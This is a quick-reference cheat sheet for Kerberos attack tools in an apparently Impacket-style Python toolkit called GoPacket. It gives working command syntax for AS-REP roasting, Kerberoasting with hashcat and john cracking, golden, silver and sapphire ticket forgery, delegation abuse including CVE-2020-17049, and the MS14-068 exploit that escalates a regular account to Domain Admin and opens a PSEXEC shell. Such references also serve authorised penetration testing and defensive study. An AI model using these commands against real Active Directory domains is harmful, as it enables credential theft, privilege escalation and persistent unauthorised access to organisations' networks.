GoPacket β Kerberos
Quick Reference
| Tool | Purpose |
|---|---|
getTGT.py |
Request a TGT and save as ccache |
getST.py |
Request a Service Ticket; S4U2Self/S4U2Proxy for delegation |
GetNPUsers.py |
AS-REP Roasting β find accounts without pre-auth |
GetUserSPNs.py |
Kerberoasting β find and request SPNs |
ticketer.py |
Forge golden, silver, or sapphire tickets |
ticketConverter.py |
Convert between ccache and kirbi (Mimikatz) formats |
tgssub.py |
Substitute sname/SPN in an existing service ticket |
goldenPac.py |
MS14-068 exploit β privilege escalation via PAC forgery |
getTGT.py
Given a password, hash, or AES key, requests a TGT from the KDC and saves it as a ccache file.
Syntax:
getTGT.py [options] <domain>/<username>[:<password>]
Common Usage:
# Password auth
getTGT.py <domain>/<username>:<password>
# Pass-the-Hash (NT hash only β use aad3... for empty LM)
getTGT.py -hashes <lm-hash>:<nt-hash> <domain>/<username>
# AES-256 key
getTGT.py -aesKey <aes256-key> <domain>/<username>
# Specify DC
getTGT.py -dc-ip <dc-ip> <domain>/<username>:<password>
# Request service ticket directly (via AS-REQ)
getTGT.py -service <spn> <domain>/<username>:<password>
Options:
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -aesKey <aes256-key> β AES-128 or AES-256 Kerberos key
- -dc-ip <dc-ip> β KDC/DC IP address
- -service <spn> β Request a service ticket directly through AS-REQ
- -principalType <type> β Principal type (default: NT_PRINCIPAL)
Notes:
- Output file is <username>.ccache in the current directory
- Use export KRB5CCNAME=<username>.ccache before running Kerberos-auth tools
getST.py
Request a Service Ticket. Supports S4U2Self and S4U2Proxy for delegation abuse (RBCD, KCD).
Syntax:
getST.py [options] <domain>/<username>[:<password>]
Common Usage:
# Standard service ticket (password)
getST.py -spn <spn> <domain>/<username>:<password>
# S4U2Self β get ticket impersonating target user (no S4U2Proxy)
getST.py -spn <spn> -impersonate <username> -self <domain>/<username>:<password>
# S4U2Proxy β RBCD full chain (need forwardable S4U2Self ticket)
getST.py -spn <spn> -impersonate <username> \
-additional-ticket <ticket> \
-hashes <lm-hash>:<nt-hash> <domain>/<username>
# RBCD β common pattern (attacker machine account to target)
getST.py -spn cifs/<target> -impersonate Administrator \
-dc-ip <dc-ip> -hashes <lm-hash>:<nt-hash> <domain>/<attackerpc$>
# Force forwardable (bypass Protected Users / Kerberos-only KCD β CVE-2020-17049)
getST.py -spn <spn> -impersonate <username> -force-forwardable \
-hashes <lm-hash>:<nt-hash> <domain>/<username>
# Cross-domain (ticket for SPN in different domain)
getST.py -spn <spn> -dc-ip <dc-ip> <domain>/<username>:<password>
# Substitute service name in ticket (altservice)
getST.py -spn <spn> -altservice <spn> <domain>/<username>:<password>
# Pass-the-Hash
getST.py -spn <spn> -hashes <lm-hash>:<nt-hash> <domain>/<username>
# AES key
getST.py -spn <spn> -aesKey <aes256-key> <domain>/<username>
# Kerberos from ccache
KRB5CCNAME=<ticket> getST.py -spn <spn> -k -no-pass <domain>/<username>
# DMSA (Delegated Managed Service Accounts)
getST.py -spn <spn> -dmsa <domain>/<username>:<password>
Options:
- -spn <spn> β Target SPN (e.g., cifs/<target>, http/<target>)
- -altservice <spn> β Override sname in the ticket after obtaining it
- -impersonate <username> β Username to impersonate via S4U2Self
- -additional-ticket <ticket.ccache> β Forwardable ticket for S4U2Proxy
- -self β Only perform S4U2Self, skip S4U2Proxy
- -force-forwardable β Force S4U2Self ticket to be forwardable (CVE-2020-17049)
- -u2u β User-to-User ticket request
- -renew β Renew TGT (set -spn krbtgt/<domain>)
- -dmsa β Use DMSA authentication
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -aesKey <aes256-key> β AES Kerberos key
- -k / -no-pass β Kerberos via ccache
- -dc-ip <dc-ip> β KDC IP
Notes:
- Output: <impersonated_user>@<spn>.ccache or <username>.ccache
- For RBCD: write delegation attribute with rbcd.py first, then call getST
GetNPUsers.py
AS-REP Roasting β query domain for accounts with "Do not require Kerberos preauthentication" and export their AS-REP hashes for cracking.
Syntax:
GetNPUsers.py [options] <domain>[/<username>[:<password>]]
Common Usage:
# List vulnerable accounts (authenticated)
GetNPUsers.py <domain>/<username>:<password> -dc-ip <dc-ip>
# Request hashes and output to file (hashcat format)
GetNPUsers.py <domain>/<username>:<password> -request -outputfile <output> -dc-ip <dc-ip>
# Unauthenticated β test userlist
GetNPUsers.py <domain>/ -usersfile users.txt -request -no-pass -dc-ip <dc-ip>
# Pass-the-Hash
GetNPUsers.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -request -dc-ip <dc-ip>
# John format
GetNPUsers.py <domain>/<username>:<password> -request -format john -outputfile <output>
Options:
- -request β Actually request TGT hashes (not just enumerate)
- -outputfile <output> β Write hashes to file
- -format {hashcat,john} β Output format (default: hashcat)
- -usersfile <file> β File of usernames to test (one per line)
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -dc-ip <dc-ip> β DC IP
- -dc-host <hostname> β DC hostname
Crack with:
hashcat -m 18200 <output> /path/to/wordlist
john --wordlist=/path/to/wordlist <output>
GetUserSPNs.py
Kerberoasting β query domain for user accounts with SPNs and request their TGS tickets for cracking.
Syntax:
GetUserSPNs.py [options] <domain>[/<username>[:<password>]]
Common Usage:
# List SPNs
GetUserSPNs.py <domain>/<username>:<password> -dc-ip <dc-ip>
# Request TGS hashes and output to file
GetUserSPNs.py <domain>/<username>:<password> -request -outputfile <output> -dc-ip <dc-ip>
# Request TGS for a single user
GetUserSPNs.py <domain>/<username>:<password> -request-user <username> -dc-ip <dc-ip>
# Save each TGS as individual ccache files
GetUserSPNs.py <domain>/<username>:<password> -save -dc-ip <dc-ip>
# Pass-the-Hash
GetUserSPNs.py -hashes <lm-hash>:<nt-hash> <domain>/<username> -request -dc-ip <dc-ip>
# Kerberoast across trust
GetUserSPNs.py <domain>/<username>:<password> -target-domain <domain> -request -dc-ip <dc-ip>
# No-preauth account (roast without creds)
GetUserSPNs.py <domain>/ -no-preauth <username> -usersfile users.txt -dc-ip <dc-ip>
# Machine accounts only
GetUserSPNs.py <domain>/<username>:<password> -machine-only -dc-ip <dc-ip>
# Stealth (removes servicePrincipalName=* LDAP filter)
GetUserSPNs.py <domain>/<username>:<password> -stealth -dc-ip <dc-ip>
Options:
- -request β Request TGS tickets and output in JtR/hashcat format
- -request-user <username> β Request TGS for a specific user
- -request-machine <machinename> β Request TGS for a specific machine
- -save β Save tickets to disk as ccache files
- -outputfile <output> β Write hashes to file
- -target-domain <domain> β Query/request across trust
- -no-preauth <username> β Use a no-preauth account to roast without credentials
- -stealth β Remove SPN filter from LDAP query
- -machine-only β Query machine accounts only
- -usersfile <file> β User list
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -dc-ip <dc-ip> β DC IP
- -dc-host <hostname> β DC hostname
Crack with:
hashcat -m 13100 <output> /path/to/wordlist
john --wordlist=/path/to/wordlist <output>
ticketer.py
Forge golden tickets (krbtgt), silver tickets (service account), or sapphire tickets.
Syntax:
ticketer.py [options] -domain <domain> -domain-sid <sid> <username>
Common Usage:
# Golden ticket (krbtgt NT hash)
ticketer.py -nthash <nt-hash> -domain-sid <sid> -domain <domain> Administrator
# Golden ticket (krbtgt AES-256 key)
ticketer.py -aesKey <aes256-key> -domain-sid <sid> -domain <domain> Administrator
# Golden ticket with extra SID (cross-domain / DA in child β Enterprise Admin)
ticketer.py -nthash <nt-hash> -domain-sid <sid> -domain <domain> \
-extra-sid <sid>-519 Administrator
# Silver ticket (service account NT hash, specific SPN)
ticketer.py -nthash <nt-hash> -domain-sid <sid> -domain <domain> \
-spn <spn> Administrator
# Silver ticket (AES key)
ticketer.py -aesKey <aes256-key> -domain-sid <sid> -domain <domain> \
-spn <spn> Administrator
# Sapphire ticket (impersonate via S4U2Self+U2U β real PAC from DC)
ticketer.py -aesKey <aes256-key> -domain-sid <sid> -domain <domain> \
-impersonate Administrator -dc-ip <dc-ip> Administrator
# Custom groups (add to Domain Admins 512, Enterprise Admins 519)
ticketer.py -nthash <nt-hash> -domain-sid <sid> -domain <domain> \
-groups 512,513,518,519,520 Administrator
# Custom duration
ticketer.py -nthash <nt-hash> -domain-sid <sid> -domain <domain> \
-duration 8760 Administrator
Options:
- -domain <domain> β FQDN of the domain (required)
- -domain-sid <sid> β Domain SID (required; get with lookupsid.py)
- -nthash <nt-hash> β NT hash for signing (krbtgt for golden, service acct for silver)
- -aesKey <aes256-key> β AES key for signing (preferred over NT hash)
- -spn <spn> β SPN for silver ticket (omit for golden ticket)
- -impersonate <username> β Sapphire ticket: impersonate this user
- -groups <groups> β Comma-separated group RIDs
- -user-id <id> β RID for the ticket user (default: 500)
- -extra-sid <sid> β Extra SIDs for PAC (e.g., Enterprise Admins across trust)
- -extra-pac β Include extra PAC entries (UPN_DNS)
- -old-pac β Use old PAC structure (exclude newer PAC fields)
- -duration <hours> β Ticket lifetime in hours (default: 87600 = 10 years)
- -dc-ip <dc-ip> β DC IP (required for sapphire ticket)
- -request β Clone a real ticket, change specified fields
Notes:
- Output: <username>.ccache
- Use export KRB5CCNAME=<username>.ccache before use
- Get domain SID: lookupsid.py <domain>/<username>:<password>@<dc-ip> | grep 'Domain SID'
ticketConverter.py
Convert Kerberos tickets between ccache (Linux) and kirbi/KRB-CRED (Mimikatz/Windows) formats.
Syntax:
ticketConverter.py <input_file> <output_file>
Common Usage:
# kirbi β ccache (Mimikatz output β Linux use)
ticketConverter.py ticket.kirbi ticket.ccache
# ccache β kirbi (Linux β Rubeus/Mimikatz use)
ticketConverter.py ticket.ccache ticket.kirbi
Notes:
- Format is auto-detected from file content
- .kirbi files are base64-encoded KRB-CRED structures from Mimikatz (kerberos::list /export)
- Use export KRB5CCNAME=ticket.ccache after conversion
tgssub.py
Substitute an sname or SPN inside an existing service ticket β useful for ticket reuse across services.
Syntax:
tgssub.py -in <ticket.ccache> -out <ticket.ccache> -altservice <service>
Common Usage:
# Change service in ticket (e.g., HTTP β CIFS for lateral movement)
tgssub.py -in <ticket> -out <output> -altservice cifs/<target>
# Force substitution regardless of original service
tgssub.py -in <ticket> -out <output> -altservice ldap/<target> -force
Options:
- -in <ticket.ccache> β Input ccache ticket
- -out <ticket.ccache> β Output ccache ticket
- -altservice <service> β New sname/SPN to set
- -force β Substitute without considering the original sname
Notes:
- Only modifies the unencrypted sname field; encrypted portion is unchanged
- Works when a DC doesn't validate sname matches the encrypted service
goldenPac.py
MS14-068 exploit β forge a PAC to gain Domain Admin from a regular domain account via Kerberos.
Syntax:
goldenPac.py [options] <domain>/<username>:<password>@<target> [command]
Common Usage:
# Exploit and drop to PSEXEC shell
goldenPac.py -dc-ip <dc-ip> <domain>/<username>:<password>@<target>
# Just save the golden ticket, don't PSEXEC
goldenPac.py -dc-ip <dc-ip> -w <output> <domain>/<username>:<password>@<target> None
# Pass-the-Hash
goldenPac.py -hashes <lm-hash>:<nt-hash> -dc-ip <dc-ip> <domain>/<username>@<target>
# Execute custom command
goldenPac.py -dc-ip <dc-ip> <domain>/<username>:<password>@<target> <command>
Options:
- -dc-ip <dc-ip> β DC IP (required)
- -target-ip <target> β Target host IP (if different from target name)
- -hashes <lm-hash>:<nt-hash> β NTLM hash auth
- -w <pathname> β Save forged TGT to ccache file
- -c <pathname> β Upload binary for execution
Notes:
- Requires unpatched MS14-068 (KB3011780 missing)
- Target must be a Windows domain member, not necessarily the DC
- Forges a Kerberos PAC to add the user to Domain Admins